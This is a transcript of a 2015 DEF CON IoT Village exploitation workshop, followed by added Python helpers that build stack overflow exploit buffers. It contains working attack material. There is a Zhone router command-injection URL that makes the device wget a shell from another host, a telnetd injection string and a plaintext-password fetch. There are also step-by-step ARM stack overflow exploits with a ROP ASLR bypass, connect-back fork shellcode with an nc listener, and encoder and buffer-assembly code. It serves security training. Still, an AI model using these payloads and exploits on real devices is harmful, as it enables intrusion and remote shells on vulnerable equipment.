
Lyon Yang
August 08, 2015

IoT Exploitation Workshop (DEFCON23 IoTVillage)

This is a light training/presentation talk.

My name is Lyon Yang and I am an IoT hacker. I live in sunny Singapore, where IoT is rapidly being deployed – in production. This walkthrough aims to shed light on the subject of IoT, from finding vulnerabilities in IoT devices to getting shiny hash prompts.
Our journey starts with a holistic view of IoT security, the issues faced by IoT devices and the common mistakes made by IoT developers. Things will then get technical as we progress into both ARM and MIPS exploitation, followed by a ‘hack-along-with-us’ workshop where you will be exploiting a commonly found IoT daemon. Whether you are new to IoT or a seasoned professional, you will likely learn something new in this workshop.

https://www.iotvillage.org/#schedule


Transcript

  1. Practical IoT Exploitation (ARM & MIPS)
     Lyon Yang / @l0Op3r – Vantage Point Security
  2. • Hi everyone, my name is Lyon Yang.
     • I hack IoT and embedded systems.
     • I live in sunny Singapore.
     • Singapore is a smart city with IoT already deployed.
     • Taxi drivers in SG will become robots.
     • I work at a company called Vantage Point.
     • Strongest technical team in Singapore/SE Asia.
     • Large collective of passionate hackers.
     • Working in the financial and government sectors.
  3. Today I want to share with you a story:
     1 year ago, I set about trying to become the “corelan” of ARM and MIPS exploitation - a formidable task! I wanted to fully understand embedded systems, try to contribute back to the community and, in the process, pop many shells!
  4. Who Am I?
     • I am a rather regular guy…
     • Basic understanding of ASM and exploitation
     • Attended some training events myself: Corelan, HITB, OSCP
     • Practice makes perfect
     • I started buying embedded devices and ‘playing’
     • Working on IoT till 2-3am most mornings.
  5. The state of IoT and embedded security: the 1990s
     • Equally as immature as the tools.
     • “1990 called” - send our bugs back
     • Basic strcpy/memcpy exploits
     • Not much privilege separation
     • Unsecured host OS
     • Backdoors are often ‘vendor features’
     • Not all vendors care about security
  6. Attack Surface of IoT
     • Think of IoT devices as miniature computers
     • ARM or MIPS CPU
     • The “hard drive” is a memory IC (flash)
     • Runs Linux (typically)
     • Communicates over WiFi/wired networks
     • Exposed services: HTTPD, UPnP, FTPD, SSHD, TelnetD
  7. At Vantage Point I work with IoT vendors within SE Asia
     • Network services (httpd/telnetd…)
     • Found more stack overflows than you can count
     • “Every string was insecurely handled”
     • Admin “restricted” shells, escaped with things like: command1 | sh, sh, dumpmem/readmem
  8. Bugs
     • Backdoor user(s)
     • Security implemented client-side
     • Debug interfaces left active
     • File upload -> shell
     • Arbitrary file read (../../../../)
     • Command injection
     • Stack overflows
     • Unauthorized remote access via UPnP
  9. Developers typically modify open source software
     • Customized to meet their own needs: MicroHTTPD, BusyBox.
     • This requires a strong C/C++ developer; most developers nowadays are not so strong.
     • The customizations are exactly where we find bugs: stack overflows in vendor modifications, additional file handlers or HTTP methods, authentication, password reset, log file access.
  10. ZHONE: “Zhone Technologies is a Global Leader in Fiber Access Transformation for Service Provider and Enterprise Networks!” Based in the US. (Reference from zhone.com)
  11. Privilege Escalation: CVE-2014-8356 – Privilege escalation via JavaScript controls
     • Access control via JavaScript! (Horrible!) The client-side checks only hide the administrative functions; the server never enforces them.
     • Direct object reference to administrative functions!
  12. Plaintext Passwords: CVE-2014-8537 – Exposed plaintext usernames & passwords
     All usernames and passwords are usually found in the backup settings file!
     • Passwords found to be Base64 encoded in the backup settings file. Base64 is an encoding, not encryption, so anyone who can fetch the file has the plaintext.
     GET /backupsettings.conf?action=getConfig&sessionKey=
  13. Command Injection (Telnetd): CVE-2014-9118 – Command injection via the telnetd session
     # download-sw "ftp://123:213@213/;ls -la"
     The URL argument reaches a shell unsanitized, so the ‘;’ ends the intended command and runs ls -la.
  14. Command Injection (HTTPD)
     Favourite way to look for command injection via IDA Pro: search for the keyword “shell” in IDA Pro (it leads straight to the code that hands request parameters to a shell).
     Sample exploit:
     /zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/shell%20-O%20/tmp/shell&ttl=30&wait=3&queries=3
     ipAddr is concatenated into the traceroute command line; the ‘|’ makes the shell run wget as well.
  15. Common Exploit Writing Issues
     • ASLR
     • Bad characters
     • Auto-killing process monitoring
     • Cache incoherency
  16. Cache Incoherency
     • Self-modifying code (an encoder/decoder) commonly causes cache incoherency.
     • The CPU fetches instructions through the instruction cache; the decoder’s writes go through the data cache and do not update the instruction cache.
     • So the modified (decoded) shellcode sits in the data cache, while the instruction fetch still sees the old bytes and executes those instead.
     Reference: http://community.arm.com/groups/processors/blog/2010/02/17/caches-and-self-modifying-code
  17. Overcoming Cache Incoherency
     • Flush the cache (Linux on ARM and MIPS exposes a cacheflush system call; from an exploit this usually means a ROP gadget that reaches it).
     • Encode and decode only the data portion of the shellcode. Data is read, not fetched as instructions, so the decoded bytes are consumed through the data cache and the instruction cache never has to be made coherent.
  18. Decoding Data (diagram): the decoder (instructions, fetched through the instruction cache) reads the encoded data portion of the shellcode, decodes it and writes it back; the shellcode instructions later read the decoded data through the data cache. Only data moves through the data cache; the instructions themselves are never modified.
  19. MIPS Exploit Writing
     • Clear cache → use a ROP gadget to clear the cache
     • ASLR → use a ROP gadget to jump to the stack
     • Bad characters → write your own encoder
     • Auto-respawn process monitoring → fork the shellcode process
  20. ARMCoder (alpha stage): the ultimate tool for crafting your shellcode
     • Thumb (-mthumb) encoder (encodes all or part of your ARM shellcode)
     • Provides you with the matching decoder stub to prepend
     • Objdumps your shellcode binary to specific formats, e.g. C: "\x41\x42\x43\x44"
     Upcoming features:
     • Detection of bad characters
     • 32-bit (ARM mode) encoder
     • Shellcode generation
     • Other forms of shellcode input (currently only reading from a binary is supported)
     • Support for the MIPS architecture
     Download link: https://github.com/l0Op3r/ARMCoder
  21. ARM Exploitation Workshop
     • Triggering stack overflows to get an ARM shell.
     • Learn ASLR bypass with ROP, the ARM way
     • Learn briefly how to read shellcode for the ARM architecture
     • Get your shiny hash prompt!
  22. Required Setup
     Requires: Kali with Python
     SSID: random2, password: iotvillage! (all lowercase)
     Credentials on the piece of paper. ssh <userid>@192.168.1.<ip>
  23. Setup
     Step 1: Download the materials on your client:
       wget http://192.168.1.1:8000/materials.tar
       wget http://192.168.1.1:8000/lyonslides.pdf
     Step 2: Extract the materials:
       tar -xvf materials.tar
     Use any of the assigned ports to listen on from the server. Port <as assigned>
  24. What are we hacking? A buffer overflow in two applications:
     • Simple buffer overflow without ASLR: ~/materials/server/practicelab1/httpdserver
     • Buffer overflow with ASLR: ~/materials/server/practicelab2/server. Hint: use ROP gadgets from the binary “server”; the binary is mapped at a fixed address even though the stack is randomized.
  25. What is a Stack Overflow? (\x41\x41\x41\x41)
     A function copies more data into a fixed-size buffer on the call stack than the buffer can hold (here via strcpy()), so the excess overwrites what lies above the buffer, including the saved return address (the saved $PC).
     (Diagram: register PC (program counter) and register SP (stack pointer); the buffer filled with AAAA…AAAA\n, strcpy() writing upwards towards the saved $PC.)
  26. Running the server with gdb
     On the server:
     1. cd /home/hacker1/materials/server/practice_lab1/
        ./httpdserver <any port you are assigned>
     2. Example: ./httpdserver 10000 &
     3. Output: [2324] ← process ID
     4. gdb attach <PID>. Example: gdb attach 2324 (equivalently gdb -p 2324)
     5. Press continue in gdb: c
  27. (no transcript text for this slide)

  28. Running the exploit: the Python script sends 950 ‘A’s to the server
     On the client (Kali Linux):
     1. cd materials/client/
     2. python arm_practice_lab_0.py <assigned server IP> <port you run the server on>
        Example: python arm_practice_lab_0.py 192.168.1.4 10000
  29. Server: re-run httpdserver and attach with gdb. Example:
       ./httpdserver <port no> &
       gdb attach <pid>
  30. Register r15/PC: what is the program counter (PC) used for?
     It holds the address (location) of the next instruction to be executed. As each instruction is fetched the program counter advances by 2 (a 16-bit Thumb instruction) or 4 (a 32-bit ARM instruction). Caveat for the shellcode later: reading PC from code does not give the address of the current instruction; in ARM state it reads as the current instruction + 8, in Thumb state as the current instruction + 4.
     (Diagram: the AAAA… buffer written by strcpy() upwards until AAAA lands on the saved PC; calculate the offset to $PC.)
  31. Offsets: how do we locate the offset to PC?
     Client:
     • /usr/share/metasploit-framework/tools/pattern_create.rb 950
  32. Offsets
     Client: in the Python script “arm_practice_lab_0.py” modify “buffer”: copy and paste the pattern generated by pattern_create.rb.
     Example: buffer = “aAbB-----yYzZ”
     Run the edited Python script: python arm_practice_lab_0.py <assigned server IP> <port you run the server on>
     Answer in: materials/client/answers/arm_practice_lab_1.py
  33. Getting the pattern offset
     Server:
     1. Type “info registers” or “i r” in gdb
     2. Copy the address in the program counter register (PC). Example: 0x72413970
  34. Locating the offset to PC
     Client:
     1. Enter the following command: /usr/share/metasploit-framework/tools/pattern_offset.rb <copied address>
        If there is no exact match (or only a “likely candidate”), try the address with its low bit set: a return address with bit 0 set selects Thumb state when it is popped into PC, and gdb shows PC with that bit cleared. 0x72413970 is not in the pattern, but 0x72413971 (the bytes “q9Ar”) is, at offset 508.
     2. Modify the Python script to confirm the offset is correct:
          buffer = 'A'*508
          buffer += 'B'*4
          buffer += 'C' * (950 - len(buffer))
        Answer in: materials/client/answers/arm_practice_lab_2.py
     3. Run the edited Python script (on the server, remember to re-run httpdserver and attach with gdb):
          python arm_practice_lab_0.py <assigned server IP> <port you run the server on>
  35. Where to put our shellcode?
     Server:
     1. Confirm that register PC has been overwritten with ‘\x42\x42\x42\x42’ by typing the following in gdb: “i r”
     2. Find out where the stack pointer is pointing by typing the following in gdb: “x/8a $sp-4”
     3. Copy the address held in $sp, i.e. where the ‘C’ bytes start. Example: 0x7efff680
  36. Add the stack location to the script
     Client:
     1. Modify the Python script to confirm that PC jumps to the right location:
          buffer = 'A'*508
          buffer += '\x80\xf6\xff\x7e'          # 0x7efff680, little-endian
          buffer += 'C' * (950-len(buffer))     # <- shellcode goes here
        Answer in: materials/client/answers/arm_practice_lab_3.py
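The offset-finding procedure of items 31 to 36 (cyclic pattern, offset lookup, confirming with 'B'*4, then writing the stack address little-endian) as an added Python example. This is not the workshop's arm_practice_lab_*.py code and it does not contact the lab server unless you call send_buffer() yourself. It reimplements the Metasploit pattern so the lookup works offline, and it adds the check the numbers in items 33 and 34 call for: PC = 0x72413970 is not in the pattern, but 0x72413971 (“q9Ar”) is, at offset 508, because bit 0 of the popped return address selects Thumb state and is cleared from the PC that gdb shows. Host, port and the raw-TCP framing in send_buffer() are assumptions.

```python
import socket
import struct

# Alphabet of Metasploit's pattern_create.rb: triplets "Aa0", "Aa1", ... "Zz9".
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern (unique up to 20280)."""
    out = bytearray()
    for up in UPPER:
        for lo in LOWER:
            for dg in DIGIT:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern is only unique up to 20280 bytes")


def pattern_offset(value, length=950):
    """Offset of a 32-bit register value inside the pattern, or None.

    Like pattern_offset.rb, the value is packed little-endian before searching,
    because that is the byte order in which it sat on the ARM stack."""
    idx = pattern_create(length).find(struct.pack("<I", value))
    return idx if idx >= 0 else None


def pc_offset_arm(pc, length=950):
    """ARM-specific lookup.

    Bit 0 of an address popped into PC selects Thumb state and is cleared from
    the PC that gdb displays, so the pattern bytes "q9Ar" (0x72413971) show up
    as PC=0x72413970, which is not in the pattern. Try the raw value first,
    then the odd variant; return (offset, value_that_was_on_the_stack)."""
    for candidate in (pc, pc | 1):
        off = pattern_offset(candidate, length)
        if off is not None:
            return off, candidate
    return None, None


def build_buffer(offset, ret_addr, payload=b"", total=950, filler=b"A"):
    """Lab-1 layout: filler up to the saved PC, the new PC little-endian, then
    the payload, which is what $sp points at after the function returns.
    Remaining space is padded with 'C' as in the workshop script."""
    buf = filler * offset + struct.pack("<I", ret_addr) + payload
    if len(buf) > total:
        raise ValueError("payload does not fit in the %d-byte request" % total)
    return buf + b"C" * (total - len(buf))


def send_buffer(host, port, buf):
    """Deliver the request (assumed: a raw TCP send; the original script's
    exact request framing is not on the page)."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(buf)


if __name__ == "__main__":
    # Reproduce the numbers from items 33 and 34: PC seen in gdb -> offset 508.
    off, on_stack = pc_offset_arm(0x72413970)
    print("offset %d, bytes on the stack were 0x%08x" % (off, on_stack))
    print(build_buffer(off, 0x7efff680)[504:516])
```

pc_offset_arm() returns the value that was actually on the stack as well as the offset, so the same helper tells you whether the overwritten function returned into Thumb code; build_buffer() raises rather than silently truncating when the shellcode no longer fits in the 950-byte request.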
  37. Shellcoding: why learn shellcoding? Lots of shellcode is available for free online! But in exploit development there are a lot of hoops and obstacles to jump through:
     - Modifications to the shellcode
     - Bad characters
  38. Bad Characters! Common bad characters: “\x00\x20\x0a”
     Functions like strcpy() stop copying at the first null byte, and \x20/\x0a (space, newline) are typically consumed as delimiters by the request parser before the buffer is copied. Common solution: encode the shellcode!
  39. Important ARM Instructions
     MOV r1, #1        move the immediate 1 into register r1
     ADD r1, r2, #3    add 3 to r2 and put the result in r1
     SUB r1, r2, #3    subtract 3 from r2 and put the result in r1
  40. Important ARM Instructions
     SVC 1             supervisor call (the system call trap): invokes the kernel system call whose number is in r7, with the arguments in r0-r6
     LDR r5, [pc, #4]  load the word at address PC+4 into r5 (a PC-relative load; remember PC reads as the current instruction + 8 in ARM state)
     STR r4, [pc, #4]  store the value of r4 at address PC+4
  41. Important ARM Instructions
     Branch (B, BL, BX, BLX and BXJ) instructions: branches, like jump instructions (JMP) in x86. B takes a label/offset; BX branches to the address in a register and switches between ARM and Thumb state according to bit 0 of that address. Example: BX r3
     http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0204j/Cihfddaf.html
  42. SYSCALL: where to find the syscall number to use?
     # cat /usr/include/arm-linux-gnueabihf/asm/unistd.h | grep execve
     #define __NR_execve (__NR_SYSCALL_BASE+ 11)
     Register r7 holds the number of the syscall to execute (11 for execve on ARM EABI).
  43. execve: int execve(const char *filename, char *const argv[], char *const envp[]);
     r0 => pointer to "//bin/sh\0" (filename)
     r1 => pointer to argv, whose first entry points to "//bin/sh\0"
     r2 => 0 (envp = NULL)
     r7 => 11 (syscall number)
     On success execve never returns; r0 only receives a value (-errno) if the call fails.
  44. Sample execve shellcode
       _start:
       .code 32
       add r3, pc, #1      @ PC reads as _start+8, so r3 = address of the Thumb code with bit 0 set
       bx r3               @ switch to Thumb mode (16-bit)
       .code 16
       mov r0, pc          @ r0 = address of this instruction + 4
       add r0, #10         @ add 10 to r0: it now points at "//bin/sh"
       str r0, [sp, #4]    @ place the pointer on the stack
       add r1, sp, #4      @ r1 = address of that pointer (argv)
       sub r2, r2, r2      @ set r2 to 0 (envp) with a null-byte-free encoding
       mov r7, #11         @ syscall number for execve in r7
       svc 1               @ execute the syscall
       .ascii "//bin/sh\0"
     Caveat: argv[1] is whatever happens to sit at sp+8; a more robust version also stores a zero there so the argv array is properly terminated.
  45. Server:
     1. Change to the shellcode directory: cd ~/materials/shellcode/
     2. Edit forkshellcode.s to your client IP address:
          .short 0x697a            @ port 31337 in network byte order
          .byte 192,168,1,3        @ <- your own IP address
          .ascii "//bin//sh\0\0"
     3. Compile the shellcode:
          # as -mthumb -o fork_shellcode.o fork_shellcode.s
          # ld -o fork_shellcode fork_shellcode.o
     4. Execute the shellcode: ./fork_shellcode
  46. Fork Shellcode: why fork()?
     • A more stable exploit, as the shellcode runs in a newly spawned child process.
     • Embedded devices commonly run a monitor that watches critical services for failure and respawns/kills the process; a forked child keeps its shell even when the exploited daemon is killed or restarted.
  47. Pop Shell: exploiting the binary and getting our first shell!
     python ARMCoder.py -scb <binary> -be
  48. Server:
     1. Dump the forkshellcode binary in Python format:
        • cd ~/materials/client
        • python ARMCoder.py -be -scb ~/materials/shellcode/fork_shellcode
  49. Client:
     1. Copy the output and paste it into the Python script, replacing the ‘C’s with the shellcode (you may want to edit materials/client/answers/arm_practice_lab_4.py):
          buffer += '\x80\xf6\xff\x7e'
          buffer += ("\xe2\x8f\x10\x01"
                     "\xe1\x2f\xff\x11"
                     …
                     "\x00\x68\x00\x00")
     2. Listen on port 31337: nc -lvp 31337
     3. Run the edited Python script (remember to re-run httpdserver and attach with gdb on the server):
          python arm_practice_lab_0.py <assigned server IP> <port you run the server on>
     4. Check for the shell on the netcat listener
  50. Common Problem: what is ASLR?
     Address space layout randomization (ASLR) is a mitigation against memory-corruption exploits: the base addresses of the stack, heap and shared libraries are randomized on each run, so a hard-coded return address such as 0x7efff680 no longer points at our shellcode. The non-PIE main binary is not randomized, which is why the gadgets come from “server” itself.
  51. ROP Gadgets: Return-Oriented Programming (ROP) – the attacker uses control of the call stack to indirectly execute machine instructions that are already present in the process.
     In simple terms: finding and executing short instruction sequences (gadgets) found at known addresses in the httpd binary or its libraries.
  52. Locating the right ROP gadget
     1. Look for a pivot (ROP gadget) to jump to the stack.
     2. Set and hit a breakpoint in the vulnerable server. In gdb: b *0x<address>
     Tools to use: Jonathan Salwan's ROPgadget (ROPGadget.py); objdump -d <binary>
  53. ROP gadget
     Server:
     3. Copy the ROP gadget location:
          8714: e28d600c   add r6, sp, #12
          8718: e12fff16   bx  r6
        (sp+12 is an even address, so bx r6 lands in ARM state; that is why the buffer later starts with an ARM→Thumb switch.)
     4. Run materials/server/practicelab2/server <assigned port> and attach gdb
     5. In gdb set a breakpoint at 0x8714 and continue:
          b *0x8714
          c
  54. ROP gadget
     Client:
     1. The offset has been calculated and is located at 520. Modify the Python script “arm_practice_lab2_0.py” and put the ROP gadget address in place of PC:
          buffer = 'A'*520
          buffer += '\x14\x87'
        Only the two low bytes of 0x8714 are sent: the terminating null that strcpy() copies supplies the third byte, and the fourth byte of the saved PC is already 0x00 because the binary is mapped at a low, fixed address. Sending '\x14\x87\x00\x00' in full would stop the copy at the first null anyway.
        Answer: materials/client/answers2/arm_practice_lab2_1.py
     2. Run the edited Python script: python arm_practice_lab2_1.py <assigned server IP> <port you run the server on>
  55. Breakpoint
     Server:
     1. Verify that the breakpoint at 0x8714 hits in the gdb session.
     2. Step through the code and copy where the ROP gadget jumped to:
          stepi
          stepi
          x/8a $pc-4
  56. Bad Characters! Common bad characters: “\x00\x20\x0a”
     Functions like strcpy() terminate after a null byte! So what do we normally do? Encode the shellcode!
  57. How to use ARMCoder:
     python ARMCoder.py -scb <binary> -spos <starting offset to encode> -epos <ending offset to encode> -be (endianness)
  58. ARMCoder example: offsets of the data portion, relative to the first byte of the shellcode in the objdump (0x8054)
     Starting position: 0x80a8 – 0x8054 = 0x54 (hexadecimal), 84 (decimal)
     Ending position: 0x80be + 2 – 0x8054 = 0x6C (hexadecimal), 108 (decimal); the end offset is exclusive, hence the + 2 past the last item
  59. ARMCoder
     Server:
     1. Change directory to ~/materials/client: cd ~/materials/client
     2. Encode and dump the fork_shellcode using ARMCoder.py:
          python ARMCoder.py -scb ../shellcode/fork_shellcode -be -spos 84 -epos 108
  60. Modifying the client exploit
     Client: modify the Python script to include the output from ARMCoder.py:
     1. Add a NOP for an alignment issue with PC:
          nop_mthumb = '\xc0\x46'    # Thumb "mov r8, r8"
     2. Copy the mthumb (ARM→Thumb switch) code from ARMCoder:
          mthumbmode = "\x01\x10\x8f\xe2\x11\xff\x2f\xe1"    # add r1, pc, #1 ; bx r1
     3. Copy the decoder code from ARMCoder:
          decoder = ("\x49\xf6\x99\x14\xc9\xf6\x99\x14\x4c\x21\x5a"
                     "\x23\x7d\x46\xee\x58\x66\x40\xee"
                     "\x50\xc0\x46\x04\x33\x08\x39\x24\x29\xf7\xda")
  61. Client: edit the following Python script: materials/client/answers2/arm_practice_lab2_1.py
     Note: do not copy the mthumb code (the first two lines of the shellcode output by ARMCoder.py). Remove "\x01\x10\x8f\xe2" "\x11\xff\x2f\xe1" from the shellcode: it has already been added as mthumbmode at the start of the buffer, in front of the decoder.
     1. Copy the shellcode output from ARMCoder into the Python script:
          shellcode = ("\x01\x24\xb6\x1b"
                       …
                       "\xf1\x99\x99\x99")
  62. Server: re-run the server and attach with gdb. Example:
       ./server <port no> &
       gdb attach <pid>
  63. Modifying the client exploit
     Client:
     1. Add all required variables to the buffer in the Python script:
          buffer = mthumbmode + nop_mthumb + decoder + shellcode
          buffer += 'A'*(520-len(buffer))
          buffer += '\x14\x87'
          s.send(buffer)
     2. Listen on port 31337: nc -lvp 31337
     3. Run the edited Python script: python arm_practice_lab2_2.py <assigned server IP> <port you run the server on>
  64. Register PC alignment problem: why add a NOP?!
     Ran it through the debugger: the shellcode decoded correctly, but the shell does not come back!
     Thumb PC-relative addressing (ADR, LDR literal, ADD Rd, PC) uses the PC rounded down to a 4-byte boundary, so shellcode that was assembled and tested at a word-aligned address must also be word-aligned inside the exploit buffer. The 8-byte mode switch plus the 30-byte decoder put the shellcode at offset 38; the 2-byte Thumb NOP (mov r8, r8) moves it to offset 40, and its PC-relative references to its own data resolve correctly again.
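The encoding and buffer-assembly steps of items 57 to 64 as one added Python example. This is not ARMCoder's code: ARMCoder's encoder and the decoder stub in item 60 are not described on the page, so a single-byte XOR over the data portion stands in for them, and the key chosen here is not what that decoder stub expects. It shows why only the data portion is encoded (the instruction bytes are never rewritten in memory, so the cache stays coherent, item 17), how a key is chosen so the wire bytes avoid \x00\x20\x0a (item 56), the "\x.." dump format, and the item-63 layout with the word-alignment NOP of item 64 and the two-byte gadget address of item 54. The instruction bytes of the sample shellcode are constructed filler; only its data portion (port 31337, listener IP, "//bin//sh\0\0") comes from item 45, and the decoder bytes are copied from item 60 purely for the layout arithmetic.

```python
import struct

BAD_CHARS = b"\x00\x20\x0a"                          # item 56: NUL, space, newline
THUMB_NOP = b"\xc0\x46"                              # item 60: Thumb "mov r8, r8"
ARM_TO_THUMB = b"\x01\x10\x8f\xe2\x11\xff\x2f\xe1"   # item 60: add r1, pc, #1 ; bx r1

# Decoder bytes exactly as ARMCoder printed them in item 60. Their semantics are
# ARMCoder's, not this XOR scheme's; they are used here only for the layout maths.
SLIDE_DECODER = (b"\x49\xf6\x99\x14\xc9\xf6\x99\x14\x4c\x21\x5a"
                 b"\x23\x7d\x46\xee\x58\x66\x40\xee"
                 b"\x50\xc0\x46\x04\x33\x08\x39\x24\x29\xf7\xda")

# Constructed stand-in for fork_shellcode: 36 bytes of placeholder "instructions"
# (no bad characters) followed by the data portion from item 45: port 31337 in
# network order, the listener IP and "//bin//sh\0\0". The real instruction bytes
# are not on the page; only the data portion is encoded anyway.
FAKE_INSTRUCTIONS = bytes(range(0x30, 0x54))
FAKE_DATA = struct.pack(">H", 31337) + bytes([192, 168, 1, 3]) + b"//bin//sh\0\0"
SAMPLE_SHELLCODE = FAKE_INSTRUCTIONS + FAKE_DATA
SPOS, EPOS = len(FAKE_INSTRUCTIONS), len(SAMPLE_SHELLCODE)   # like -spos / -epos


def has_bad_chars(data, bad=BAD_CHARS):
    return any(b in data for b in bad)


def xor_encode_slice(shellcode, spos, epos, bad=BAD_CHARS):
    """Encode only shellcode[spos:epos] (the data portion) with a one-byte XOR key
    chosen so that neither the key nor any encoded byte is a bad character.
    The instruction bytes are left as they are: nothing that is executed is ever
    rewritten in memory, so the instruction cache never goes stale (item 17).
    Returns (key, encoded_shellcode)."""
    data = shellcode[spos:epos]
    for key in range(1, 256):
        if key in bad:
            continue
        enc = bytes(b ^ key for b in data)
        if not has_bad_chars(enc, bad):
            return key, shellcode[:spos] + enc + shellcode[epos:]
    raise ValueError("no single-byte XOR key avoids %r" % bad)


def xor_decode_slice(encoded, key, spos, epos):
    """What the run-time decoder stub has to do, in Python, to check the round trip."""
    return encoded[:spos] + bytes(b ^ key for b in encoded[spos:epos]) + encoded[epos:]


def to_c_string(data, per_line=16):
    """Dump bytes in the "\\x41\\x42" form that is pasted into the exploit script."""
    lines = []
    for i in range(0, len(data), per_line):
        lines.append('"' + "".join("\\x%02x" % b for b in data[i:i + per_line]) + '"')
    return "\n".join(lines)


def assemble_rop_buffer(decoder, shellcode, offset=520, gadget=0x8714, bad=BAD_CHARS):
    """Item-63 layout: ARM->Thumb switch, decoder, shellcode at the start of the
    buffer, 'A' filler up to the saved PC, then the pivot gadget address."""
    prefix = ARM_TO_THUMB + decoder
    if len(prefix) % 2:
        raise ValueError("decoder must consist of whole Thumb halfwords")
    # Thumb PC-relative addressing (ADR, LDR literal) rounds PC down to a word
    # boundary, so the shellcode must sit at the alignment it had when it was
    # assembled stand-alone. Assumes the buffer itself starts word-aligned on the
    # stack (sp+12 from the item-53 gadget is).
    if len(prefix) % 4 == 2:
        prefix += THUMB_NOP
    body = prefix + shellcode
    if len(body) > offset:
        raise ValueError("%d payload bytes do not fit before the saved PC at %d"
                         % (len(body), offset))
    buf = body + b"A" * (offset - len(body))
    # Only the two low bytes of 0x8714 go on the wire: the NUL that strcpy() copies
    # and the already-zero high byte of the non-PIE binary's address complete the word.
    buf += struct.pack("<H", gadget)
    if has_bad_chars(buf, bad):
        raise ValueError("buffer still contains a bad character; check -spos/-epos")
    return buf


if __name__ == "__main__":
    key, enc = xor_encode_slice(SAMPLE_SHELLCODE, SPOS, EPOS)
    assert xor_decode_slice(enc, key, SPOS, EPOS) == SAMPLE_SHELLCODE
    print("XOR key 0x%02x\n%s" % (key, to_c_string(enc)))
    buf = assemble_rop_buffer(SLIDE_DECODER, enc)
    print("%d bytes on the wire, shellcode at offset %d" % (len(buf), buf.find(enc)))
```

With the item-60 decoder the prefix is 8 + 30 = 38 bytes, so assemble_rop_buffer() inserts the NOP and the shellcode lands at offset 40, matching the hand-built buffer of item 63; the final bad-character check catches the case where -spos/-epos left a NUL (for example the "\0\0" after //bin//sh) outside the encoded range.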